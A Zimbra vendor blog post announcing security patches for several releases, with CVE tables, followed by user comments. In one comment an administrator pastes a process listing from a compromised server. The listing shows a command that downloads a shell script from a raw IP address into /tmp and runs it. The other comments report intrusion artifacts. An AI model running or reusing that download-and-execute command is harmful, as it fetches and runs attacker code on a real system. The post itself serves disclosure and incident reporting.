NEW Zimbra Patches: 8.8.12 Patch 1 + 8.8.11 Patch 4 + 8.8.10 Patch 8 + 8.8.9 Patch 10 + 8.7.11 Patch 11 + 8.6.0 Patch 14

Hello Zimbra Friends, Customers & Partners,

We have six new patches to announce:

  • Zimbra 8.8.12 “Isaac Newton” Patch 1
  • Zimbra 8.8.11 “Homi Bhabha” Patch 4
  • Zimbra 8.8.10 “Konrad Zuse” Patch 8
  • Zimbra 8.8.9 “Curie” Patch 10
  • Zimbra 8.7.11 Patch 11
  • Zimbra 8.6.0 Patch 14

For Zimbra 8.8.8 and above, you don’t need to download any patch builds. The patch packages can be installed using Linux package management commands. Please refer to the respective release notes for patch installation on Red Hat and Ubuntu platforms.

Note: Installing a zimbra-patch package only updates the Zimbra core packages.

Zimbra 8.8.12 “Isaac Newton” Patch 1

Patch 1 is here for the Zimbra 8.8.12 “Isaac Newton” GA release, and it includes fixes as listed in the release notes. Please refer to the release notes for Zimbra 8.8.12 Patch 1 installation on Red Hat and Ubuntu platforms.

Security Fixes

Information about security fixes, security response policy and vulnerability rating classification is listed below. See the Zimbra Security Response Policy and the Zimbra Vulnerability Rating Classification information for details.

Bug# Summary CVE-ID CVSS Score Zimbra Rating Fix Release or Patch Version
109117 Persistent XSS – Drive [CWE-79] 3.5 Minor 8.8.12 Patch 1

Fixed Issues

After an upgrade to 8.8.12, IMAP users are unable to access folders with names containing non-ASCII characters. This is fixed in 8.8.12 P1.

Zimbra 8.8.11 “Homi Bhabha” Patch 4

Patch 4 is here for the Zimbra 8.8.11 “Homi Bhabha” GA release, and it includes fixes as listed in the release notes. Please refer to the release notes for Zimbra 8.8.11 Patch 4 installation on Redhat and Ubuntu platforms.

Security Fixes

Bug# Summary CVE-ID CVSS Score Zimbra Rating Fix Release or Patch Version
109096 Blind SSRF vulnerability – Feed [CWE-918] CVE-2019-6981 4.0 Minor 8.8.11 Patch 4
109127 SSRF vulnerability – ProxyServlet [CWE-918 / CWE-807] CVE-2019-9621 4.0 Minor 8.8.11 Patch 4

Fixed Issues

Fixed the CPU usage spike observed when viewing mails.

Zimbra 8.8.10 “Konrad Zuse” Patch 8

Patch 8 is here for the Zimbra 8.8.10 “Konrad Zuse” GA release, and it includes fixes as listed in the release notes. Please refer to the release notes for Zimbra 8.8.10 Patch 8 installation on Red Hat and Ubuntu platforms.

Security Fixes

Bug# Summary CVE-ID CVSS Score Zimbra Rating Fix Release or Patch Version
109096 Blind SSRF vulnerability – Feed [CWE-918] CVE-2019-6981 4.0 Minor 8.8.10 Patch 8
109127 SSRF vulnerability – ProxyServlet [CWE-918 / CWE-807] CVE-2019-9621 4.0 Minor 8.8.10 Patch 8

Fixed Issues

Fixed the CPU usage spike observed when viewing mails.

Zimbra 8.8.9 “Curie” Patch 10

Patch 10 is here for the Zimbra 8.8.9 “Curie” GA release, and it includes fixes as listed in the release notes. Please refer to the release notes for Zimbra 8.8.9 Patch 10 installation on Red Hat and Ubuntu platforms.

Security Fixes

Bug# Summary CVE-ID CVSS Score Zimbra Rating Fix Release or Patch Version
109097 Insecure object deserialization – IMAP [CWE-502] CVE-2019-6980 5.4 Major 8.8.9 Patch 10
109096 Blind SSRF vulnerability – Feed [CWE-918] CVE-2019-6981 4.0 Minor 8.8.9 Patch 10
109127 SSRF vulnerability – ProxyServlet [CWE-918 / CWE-807] CVE-2019-9621 4.0 Minor 8.8.9 Patch 10

Zimbra 8.7.11 Patch 11

Patch 11 is here for the Zimbra 8.7.11 GA release, and it includes fixes as listed in the release notes.

Security Fixes

Bug# Summary CVE-ID CVSS Score Zimbra Rating Fix Release or Patch Version
109096 Blind SSRF vulnerability – Feed [CWE-918] CVE-2019-6981 4.0 Minor 8.7.11 Patch 11
109127 SSRF vulnerability – ProxyServlet [CWE-918 / CWE-807] CVE-2019-9621 4.0 Minor 8.7.11 Patch 11

Fixed Issues

Fixed session time out when deleting mails.
Fixed the CPU usage spike observed when viewing mails.

Patch Installation

Download the patch for Network Edition and Open Source Edition.

Please refer to the release notes for 8.7.11 Patch 11 installation.
Note: This patch should be installed only on all mailbox nodes running in your environment.

Zimbra 8.6.0 Patch 14

Patch 14 is here for the Zimbra 8.6.0 GA release, and it includes fixes as listed in the release notes.

Security Fixes

Bug# Summary CVE-ID CVSS Score Zimbra Rating Fix Release or Patch Version
109097 Insecure object deserialization – IMAP [CWE-502] CVE-2019-6980 5.4 Major 8.6.0 Patch 14
109096 Blind SSRF vulnerability – Feed [CWE-918] CVE-2019-6981 4.0 Minor 8.6.0 Patch 14
109127 SSRF vulnerability – ProxyServlet [CWE-918 / CWE-807] CVE-2019-9621 4.0 Minor 8.6.0 Patch 14

Patch Installation

Download the patch for Network Edition and Open Source Edition.

Please refer to the release notes for Zimbra 8.6.0 Patch 14 installation.
Note: This patch should be installed only on all mailbox nodes running in your environment.

Thank you,
Your Zimbra Team

7 Responses to NEW Zimbra Patches: 8.8.12 Patch 1 + 8.8.11 Patch 4 + 8.8.10 Patch 8 + 8.8.9 Patch 10 + 8.7.11 Patch 11 + 8.6.0 Patch 14

  1. Eduard Dragan April 18, 2019 at 11:28 AM #

    Hi guys,

    I’ve applied the latest fix for 8.6.0 (patch 14 – zcs-patch-8.6.0_GA_1242) and some vulnerabilities still exist on the mailboxd service.
    ps -efww | grep sh
    zimbra 2276 23225 0 Apr17 ? 00:00:00 /bin/sh -c wget http://177.53.8.84:8081/s.sh -O /tmp/s.sh;curl http://177.53.8.84:8081/s.sh -L > /tmp/s.sh;sh /tmp/s.sh
    zimbra 2280 23225 0 Apr17 ? 00:00:00 /bin/sh -c wget http://177.53.8.84:8081/s.sh -O /tmp/s.sh;curl http://177.53.8.84:8081/s.sh -L > /tmp/s.sh;sh /tmp/s.sh
    zimbra 2283 23225 0 Apr17 ? 00:00:00 /bin/sh -c wget http://177.53.8.84:8081/s.sh -O /tmp/s.sh;curl http://177.53.8.84:8081/s.sh -L > /tmp/s.sh;sh /tmp/s.sh
    zimbra 2296 2280 0 Apr17 ? 00:00:00 sh /tmp/s.sh
    postfix 2479 23961 0 13:05 ? 00:00:00 showq -t unix -u
    zimbra 2713 2296 0 Apr17 ? 00:00:00 bash /tmp/l.sh
    zimbra 2719 2276 0 Apr17 ? 00:00:00 sh /tmp/s.sh
    zimbra 2748 2719 0 Apr17 ? 00:00:00 bash /tmp/l.sh
    zimbra 2760 2283 0 Apr17 ? 00:00:00 sh /tmp/s.sh
    zimbra 4144 2760 0 Apr17 ? 00:00:00 bash /tmp/l.sh

    The parrent pid that run this processes is:
    zimbra 23225 23224 2 Apr16 ? 00:53:13 /opt/zimbra/java/bin/java -Dfile.encoding=UTF-8 -server -Dhttps.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djdk.tls.client.protocols=TLSv1,TLSv1.1,TLSv1.2 -Djava.awt.headless=true -Dsun.net.inetaddr.ttl=60 -Dorg.apache.jasper.compiler.disablejsr199=true -XX:+UseConcMarkSweepGC -XX:PermSize=128m -XX:MaxPermSize=350m -XX:SoftRefLRUPolicyMSPerMB=1 -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCApplicationStoppedTime -XX:-OmitStackTraceInFastThrow -Xloggc:/opt/zimbra/log/gc.log -XX:-UseGCLogFileRotation -XX:NumberOfGCLogFiles=20 -XX:GCLogFileSize=4096K -Djava.net.preferIPv4Stack=true -Xss256k -Xms1920m -Xmx1920m -Xmn480m -Djava.io.tmpdir=/opt/zimbra/mailboxd/work -Djava.library.path=/opt/zimbra/lib -Djava.endorsed.dirs=/opt/zimbra/mailboxd/common/endorsed -Dzimbra.config=/opt/zimbra/conf/localconfig.xml -Djetty.home=/opt/zimbra/mailboxd -DSTART=/opt/zimbra/mailboxd/etc/start.config -jar /opt/zimbra/mailboxd/start.jar –module=zimbra,server,servlet,servlets,jsp,jmx,resources,websocket,ext,plus,rewrite,monitor,continuation,webapp,setuid jetty.home=/opt/zimbra/mailboxd /opt/zimbra/mailboxd/etc/jetty.xml

    In order to minimize the impact I’ve disabled exec on /tmp and blocked all outgoing connections originating from server.

    • Gayle Billat April 24, 2019 at 9:18 PM #

      Hi Eduard – we don’t have any vulnerabilities reported, so please report this to Zimbra Support. Thank you!

    • T April 29, 2019 at 1:49 AM #

      I got hit by the same thing!

      In /tmp are the same files you have as well as a bunch of files I found under under /opt/zimbra/log/.cache/bash. This is obviously a bogus folder they they created.
      All files under that folder are owned by zimbra, which points me to a possible “yet” undiscovered zimbra exploit to then run sqlmap on MANY other systems. They are using tor and ssh to send their commands to hacked systems.

      I’ve saved all of the files they’ve used that I can find. Wish I knew exactly how they got in.
      I’ve also disabled the Internet facing interface.

      Zimbra: Please contact me if you want access to the files they used. You have my personal email now.

    • Gayle Billat April 30, 2019 at 4:45 PM #

      Hi Trevor – Are you also on Zimbra 8.6.0? 8.6.0 is no longer supported, so to stay current with security fixes please upgrade to at least 8.7.11. Click here to see the supported Zimbra versions. Thank you.

    • Gayle Billat April 30, 2019 at 4:44 PM #

      Hi Eduard — 8.6.0 is no longer supported, so to stay current with security fixes please upgrade to at least 8.7.11. Click here to see the supported Zimbra versions. Thank you.

  2. pappaya May 31, 2019 at 8:42 AM #

    Notify us on Zimbra Open source Edition Patch updates to our email

    • Gayle Billat June 17, 2019 at 11:41 PM #

      Hi – To should be running Patch 10 for Zimbra Open Source Edition Version 8.8.9. Thanks

Leave a Reply